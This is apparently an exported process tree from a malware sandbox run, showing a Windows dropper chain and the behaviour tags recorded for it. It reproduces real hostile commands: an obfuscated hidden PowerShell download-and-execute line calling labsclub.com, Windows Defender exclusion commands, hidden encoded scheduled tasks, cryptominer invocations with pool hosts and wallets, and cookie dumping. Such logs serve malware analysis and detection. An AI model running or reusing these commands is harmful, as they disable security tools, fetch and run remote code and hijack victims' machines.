C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y4f24ya1.lap\customer6.exe & exit
15⤵
PID:1800

C:\Users\Admin\AppData\Local\Temp\y4f24ya1.lap\customer6.exe
C:\Users\Admin\AppData\Local\Temp\y4f24ya1.lap\customer6.exe
16⤵
PID:6400

C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe"
17⤵
PID:4604

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2s3c2q20.j3z\GcleanerWW.exe /mixone & exit
15⤵
PID:6256

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gcrjdjwz.opx\privacytools5.exe & exit
15⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\gcrjdjwz.opx\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\gcrjdjwz.opx\privacytools5.exe
16⤵
PID:6208

C:\Users\Admin\AppData\Local\Temp\gcrjdjwz.opx\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\gcrjdjwz.opx\privacytools5.exe
17⤵
PID:4316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wzyf0np3.hek\19.exe & exit
15⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\wzyf0np3.hek\19.exe
C:\Users\Admin\AppData\Local\Temp\wzyf0np3.hek\19.exe
16⤵
PID:6788

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\javcs\install.vbs"
17⤵
PID:6932

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcs\install.dll",install
18⤵
PID:7000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kkaexinp.gbr\b9706c20.exe & exit
15⤵
PID:4380

C:\Users\Admin\AppData\Local\Temp\kkaexinp.gbr\b9706c20.exe
C:\Users\Admin\AppData\Local\Temp\kkaexinp.gbr\b9706c20.exe
16⤵
PID:6312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 476
17⤵
- Program crash
PID:4876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\boayewiz.5m0\setup.exe /8-2222 & exit
15⤵
PID:672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p0ffalje.kho\setup.exe /S /kr /site_id=754 & exit
15⤵
PID:7500

C:\Users\Admin\AppData\Local\Temp\p0ffalje.kho\setup.exe
C:\Users\Admin\AppData\Local\Temp\p0ffalje.kho\setup.exe /S /kr /site_id=754
16⤵
PID:7892

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
17⤵
PID:6824

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
18⤵
PID:7932

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
19⤵
PID:7676

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
19⤵
PID:7868

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gSMTknLnE" /SC once /ST 03:58:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
17⤵
- Creates scheduled task(s)
PID:7640

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gSMTknLnE"
17⤵
PID:8040

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gSMTknLnE"
17⤵
PID:6388

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 23:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\vDrhoTr.exe\" 9n /site_id 754 /S" /V1 /F
17⤵
- Creates scheduled task(s)
PID:7992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\htegn0lq.b1y\Four.exe & exit
15⤵
PID:8084

C:\Users\Admin\AppData\Local\Temp\htegn0lq.b1y\Four.exe
C:\Users\Admin\AppData\Local\Temp\htegn0lq.b1y\Four.exe
16⤵
PID:7316

C:\Users\Admin\AppData\Local\Temp\XCTJL4FWET\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\XCTJL4FWET\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
17⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\XCTJL4FWET\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\XCTJL4FWET\multitimer.exe" 1 3.1616801453.605e6ead6791d 104
18⤵
PID:7568

C:\Users\Admin\AppData\Local\Temp\XCTJL4FWET\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\XCTJL4FWET\multitimer.exe" 2 3.1616801453.605e6ead6791d
19⤵
PID:6976

C:\Users\Admin\AppData\Local\Temp\0iqnbjc3inv\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\0iqnbjc3inv\Setup3310.exe" /Verysilent /subid=577
20⤵
PID:6952

C:\Users\Admin\AppData\Local\Temp\is-NBUBP.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NBUBP.tmp\Setup3310.tmp" /SL5="$20598,138429,56832,C:\Users\Admin\AppData\Local\Temp\0iqnbjc3inv\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:7860

C:\Users\Admin\AppData\Local\Temp\is-V1OLR.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-V1OLR.tmp\Setup.exe" /Verysilent
22⤵
PID:8636

C:\Users\Admin\AppData\Local\Temp\y3scgmg4kem\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\y3scgmg4kem\AwesomePoolU1.exe"
20⤵
PID:2712

C:\Users\Admin\AppData\Local\Temp\m1wljre040k\vict.exe
"C:\Users\Admin\AppData\Local\Temp\m1wljre040k\vict.exe" /VERYSILENT /id=535
20⤵
PID:7696

C:\Users\Admin\AppData\Local\Temp\is-TIVUB.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TIVUB.tmp\vict.tmp" /SL5="$2059A,870426,780800,C:\Users\Admin\AppData\Local\Temp\m1wljre040k\vict.exe" /VERYSILENT /id=535
21⤵
PID:812

C:\Users\Admin\AppData\Local\Temp\is-57AG4.tmp\winhost.exe
"C:\Users\Admin\AppData\Local\Temp\is-57AG4.tmp\winhost.exe" 535
22⤵
PID:8924

C:\Users\Admin\AppData\Local\Temp\fpy2pl3vomt\2wsz12zgilv.exe
"C:\Users\Admin\AppData\Local\Temp\fpy2pl3vomt\2wsz12zgilv.exe" /ustwo INSTALL
20⤵
PID:6420

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "2wsz12zgilv.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\fpy2pl3vomt\2wsz12zgilv.exe" & exit
21⤵
PID:9052

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "2wsz12zgilv.exe" /f
22⤵
- Kills process with taskkill
PID:9032

C:\Users\Admin\AppData\Local\Temp\ntykmzhwnsq\app.exe
"C:\Users\Admin\AppData\Local\Temp\ntykmzhwnsq\app.exe" /8-23
20⤵
PID:8700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Restless-Fog'
21⤵
PID:8776

C:\Program Files (x86)\Restless-Fog\7za.exe
"C:\Program Files (x86)\Restless-Fog\7za.exe" e -p154.61.71.51 winamp.7z
21⤵
PID:5500

C:\Program Files (x86)\Restless-Fog\app.exe
"C:\Program Files (x86)\Restless-Fog\app.exe" /8-23
21⤵
PID:8852

C:\Users\Admin\AppData\Local\Temp\V8FV1VAKT5\setups.exe
"C:\Users\Admin\AppData\Local\Temp\V8FV1VAKT5\setups.exe" ll
17⤵
PID:7184

C:\Users\Admin\AppData\Local\Temp\is-RE7G8.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RE7G8.tmp\setups.tmp" /SL5="$A039C,478262,251392,C:\Users\Admin\AppData\Local\Temp\V8FV1VAKT5\setups.exe" ll
18⤵
PID:5468

C:\Users\Admin\AppData\Local\Temp\jg5frohuwvv\vict.exe
"C:\Users\Admin\AppData\Local\Temp\jg5frohuwvv\vict.exe" /VERYSILENT /id=535
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4608

C:\Users\Admin\AppData\Local\Temp\is-7KM9L.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7KM9L.tmp\vict.tmp" /SL5="$10384,870426,780800,C:\Users\Admin\AppData\Local\Temp\jg5frohuwvv\vict.exe" /VERYSILENT /id=535
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1296

C:\Users\Admin\AppData\Local\Temp\is-7L3GM.tmp\winhost.exe
"C:\Users\Admin\AppData\Local\Temp\is-7L3GM.tmp\winhost.exe" 535
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6100

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IenkzGhYj.dll"
11⤵
PID:1080

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IenkzGhYj.dll"
12⤵
PID:3384

C:\Windows\system32\regsvr32.exe
/s "C:\Users\Admin\AppData\Local\Temp\IenkzGhYj.dll"
13⤵
PID:3744

C:\Windows\SysWOW64\cmd.exe
cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IenkzGhYj.dllHj8PPnZjm.dll"
11⤵
PID:5236

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IenkzGhYj.dllHj8PPnZjm.dll"
12⤵
PID:6880

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:8372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
PID:8844

C:\Users\Admin\AppData\Local\Temp\jx5eokees1d\elnhdiu5qnm.exe
"C:\Users\Admin\AppData\Local\Temp\jx5eokees1d\elnhdiu5qnm.exe" /ustwo INSTALL
8⤵
- Executes dropped EXE
PID:4632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "elnhdiu5qnm.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\jx5eokees1d\elnhdiu5qnm.exe" & exit
9⤵
PID:5904

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "elnhdiu5qnm.exe" /f
10⤵
- Kills process with taskkill
PID:5276

C:\Users\Admin\AppData\Local\Temp\qqjvkfmrbu2\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\qqjvkfmrbu2\AwesomePoolU1.exe"
8⤵
- Executes dropped EXE
PID:2644

C:\Users\Admin\AppData\Local\Temp\pdkzppsdigp\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\pdkzppsdigp\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:2424

C:\Users\Admin\AppData\Local\Temp\is-L4UI2.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L4UI2.tmp\IBInstaller_97039.tmp" /SL5="$103CE,9919830,721408,C:\Users\Admin\AppData\Local\Temp\pdkzppsdigp\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2332

C:\Users\Admin\AppData\Local\Temp\dtahmluwnce\5p0hooqkyn3.exe
"C:\Users\Admin\AppData\Local\Temp\dtahmluwnce\5p0hooqkyn3.exe" /1-610
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Restless-Water'
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5204

C:\Program Files (x86)\Restless-Water\7za.exe
"C:\Program Files (x86)\Restless-Water\7za.exe" e -p154.61.71.51 winamp.7z
9⤵
PID:2208

C:\Program Files (x86)\Restless-Water\5p0hooqkyn3.exe
"C:\Program Files (x86)\Restless-Water\5p0hooqkyn3.exe" /1-610
9⤵
PID:5420

C:\Program Files (x86)\Restless-Water\5p0hooqkyn3.exe
"C:\Program Files (x86)\Restless-Water\5p0hooqkyn3.exe" /1-610
10⤵
PID:8032

C:\Users\Admin\AppData\Local\Temp\k0zb5r4b5tw\icmnqirhger.exe
"C:\Users\Admin\AppData\Local\Temp\k0zb5r4b5tw\icmnqirhger.exe" /quiet SILENT=1 AF=756
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5264

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\k0zb5r4b5tw\icmnqirhger.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\k0zb5r4b5tw\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616541754 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
9⤵
PID:6052

C:\Users\Admin\AppData\Local\Temp\5e3metgqzkp\app.exe
"C:\Users\Admin\AppData\Local\Temp\5e3metgqzkp\app.exe" /8-23
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Green-Meadow'
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5544

C:\Program Files (x86)\Green-Meadow\7za.exe
"C:\Program Files (x86)\Green-Meadow\7za.exe" e -p154.61.71.51 winamp.7z
9⤵
PID:4652

C:\Program Files (x86)\Green-Meadow\app.exe
"C:\Program Files (x86)\Green-Meadow\app.exe" /8-23
9⤵
PID:4900

C:\Program Files (x86)\Green-Meadow\app.exe
"C:\Program Files (x86)\Green-Meadow\app.exe" /8-23
10⤵
PID:7252

C:\Users\Admin\AppData\Local\Temp\ocscxjgchjy\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\ocscxjgchjy\vpn.exe" /silent /subid=482
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5508

C:\Users\Admin\AppData\Local\Temp\is-OM8AB.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OM8AB.tmp\vpn.tmp" /SL5="$404A8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ocscxjgchjy\vpn.exe" /silent /subid=482
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
10⤵
PID:4800

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
11⤵
PID:4640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
10⤵
PID:4284

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
11⤵
PID:1100

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
10⤵
PID:7004

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
10⤵
PID:6272

C:\Users\Admin\AppData\Local\Temp\5E6CAO5QTG\setups.exe
"C:\Users\Admin\AppData\Local\Temp\5E6CAO5QTG\setups.exe" ll
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4664

C:\Users\Admin\AppData\Local\Temp\is-54B1N.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-54B1N.tmp\setups.tmp" /SL5="$4013E,478262,251392,C:\Users\Admin\AppData\Local\Temp\5E6CAO5QTG\setups.exe" ll
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:216

C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2360

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:4724

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:532

C:\Users\Admin\AppData\Roaming\9512.tmp.exe
"C:\Users\Admin\AppData\Roaming\9512.tmp.exe"
5⤵
PID:2424

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
6⤵
PID:1388

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
6⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4516

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
5⤵
PID:3168

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:3348

C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:5052

C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
4⤵
PID:5716

C:\ProgramData\855056.exe
"C:\ProgramData\855056.exe"
5⤵
PID:2128

C:\ProgramData\5337706.exe
"C:\ProgramData\5337706.exe"
5⤵
PID:2936

C:\ProgramData\923821.exe
"C:\ProgramData\923821.exe"
5⤵
PID:5924

C:\ProgramData\7819809.exe
"C:\ProgramData\7819809.exe"
5⤵
PID:2336

C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
4⤵
PID:1396

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:3524

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:5900

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5092

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4184

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4392

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4468

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
1⤵
PID:5360

C:\Users\Admin\AppData\Local\Temp\is-MBUC4.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-MBUC4.tmp\{app}\chrome_proxy.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5408

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6036

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 83047B6EE11E6D975F6440852872BF78 C
2⤵
PID:412

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 4E16C336C316206E3B64899F62611F8E
2⤵
PID:2952

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
2⤵
PID:8604

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
3⤵
PID:7248

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
4⤵
PID:8084

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffeebf39ec0,0x7ffeebf39ed0,0x7ffeebf39ee0
5⤵
PID:6508

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff7ac894e60,0x7ff7ac894e70,0x7ff7ac894e80
6⤵
PID:4160

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,6387542773388399655,525396954848012977,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8084_1055879415" --mojo-platform-channel-handle=1768 /prefetch:8
5⤵
PID:8772

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1704,6387542773388399655,525396954848012977,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8084_1055879415" --mojo-platform-channel-handle=2368 /prefetch:8
5⤵
PID:8556

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1704,6387542773388399655,525396954848012977,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8084_1055879415" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1720 /prefetch:2
5⤵
PID:6840

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
